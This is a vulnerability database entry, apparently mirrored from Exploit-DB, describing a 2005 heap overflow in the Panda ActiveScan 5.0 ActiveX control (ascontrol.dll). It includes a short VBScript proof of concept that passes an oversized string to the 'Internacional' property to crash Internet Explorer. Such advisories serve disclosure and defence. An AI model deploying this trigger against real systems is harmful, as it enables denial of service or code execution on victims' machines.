header-logo
Suggest Exploit
vendor:
Panda ActiveScan
by:
SecurityFocus
7.5
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: Panda ActiveScan
Affected Version From: 5
Affected Version To: 5
Patch Exists: Yes
Related CWE: N/A
CPE: a:panda_software:panda_activescan
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

Panda ActiveScan Heap Overflow Vulnerability

It has been reported that Panda ActiveScan may be prone to a remote heap overflow vulnerability that may allow an attacker to cause a denial of service condition in Internet Explorer or leverage the issue to execute arbitrary code. The issue is reported to exist in the 'ascontrol.dll' file, specifically the 'Internacional' property of the 'ReportHebrew' object is identified as vulnerable. Panda ActiveScan 5.0 has been reported to be prone to this issue.

Mitigation:

Update to the latest version of Panda ActiveScan.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10065/info

It has been reported that Panda ActiveScan may be prone to a remote heap overflow vulnerability that may allow an attacker to cause a denial of service condition in Internet Explorer or leverage the issue to execute arbitrary code.

The issue is reported to exist in the 'ascontrol.dll' file, specifically the 'Internacional' property of the 'ReportHebrew' object is identified as vulnerable.

Panda ActiveScan 5.0 has been reported to be prone to this issue. 

<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControl.ReportHebrew.1" )

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
mymy.Internacional a
</script>

Navigation

Suggest Exploit

Services By CQR